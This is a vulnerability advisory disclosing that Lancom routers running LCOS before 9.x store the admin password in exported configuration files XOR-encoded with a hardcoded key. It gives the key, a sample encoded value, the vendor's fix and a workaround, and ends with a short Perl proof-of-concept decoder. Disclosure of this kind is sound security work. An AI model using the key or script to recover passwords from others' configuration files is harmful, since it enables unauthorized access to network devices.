Vulnerability Report: Lancom Router Weak Password Encryption (pre LCOS 9.x)

Sorry for the late re-discovery - the issue was found and reported in 2009, but had been accidentally buried on my side, and only was re-discovered again in late 2016.


Problem

The enrcyption of passwords in router configuration files can trivially be broken.

Systems affected

System tested: Lancom 1751 UMTS, LCOS 7.62.0042 (dated 05.03.2009)

Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)


Explanation

When exporting the configuration into a text file you can find the encrypted admin password in the section {Secrets} under the key 2.1 (in this demo case it is "dummy")

{Secrets}
2.1 == 2f1b18091d

The secret is decrypted by simply XORing it byte-wise with the hardcoded String "Knuddelbaerchen" (which is German for "cuddly baby baer")


Fix

The affected LCVOS versions pre-dating LCOS v9.x are no longer supported. Newer models / versions are not affected.

Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).

Thank you to Lancom for quicky responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).


Workaround

When exporting the config file, please store it only protected as if it was clear text - as advised in the manual.

When forwarding it to support, vendors or consultants please remove the {Secrets} section (especially the key 2.1).


Proof of Concept

#!/usr/bin/perl -w
#----------------------------------------------------------------------
#
# ./lancom-pw-decrypt.pl ....pw....


$key="Knuddelbaerchen";

$text = pack('H*',$ARGV[0]);

$len = length($text);
$xlen = int((length($text) / length($key))+1);

$result = $text ^ ($key x $xlen);
$result = substr($result,0,$len);

print "$result\n";


#----------------------------------------------------------------------
# 2009/2016       
# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/